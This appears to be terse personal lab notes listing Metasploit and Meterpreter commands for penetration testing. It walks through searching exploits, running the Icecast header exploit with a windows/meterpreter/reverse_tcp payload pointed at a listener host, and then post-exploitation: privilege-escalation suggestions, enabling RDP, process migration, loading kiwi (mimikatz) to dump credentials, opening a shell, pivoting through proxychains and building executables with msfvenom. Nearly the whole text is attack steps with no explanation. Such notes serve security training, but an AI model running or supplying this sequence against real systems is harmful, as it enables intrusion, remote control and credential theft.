uses exploit-db
searchsploit <search>
sudo msfdb init
msfconsole
msf> db_nmap <nmap commands>
msf> run post/windows/gather/checkvm
msf> run post/multi/recon/local_exploit_suggester # to elevate privileges
msf> run post/windows/manage/enable_rdp
msf> use exploit/windows/http/icecast_header
msf> set PAYLOAD windows/meterpreter/reverse_tcp
msf> set LHOST 10.4.5.126 # find from ip addr
msf> use icecast
msf> set RHOST 10.10.173.148
msf> run
# into meterpreter
jobs
sessions
sessions -i 1
migrate # move to another process
getuid
getprivs
sysinfo
load kiwi # new version of mimikatz
upload # file
shell
bg
proxychains
run<tab>
# create executable
$ msfvenom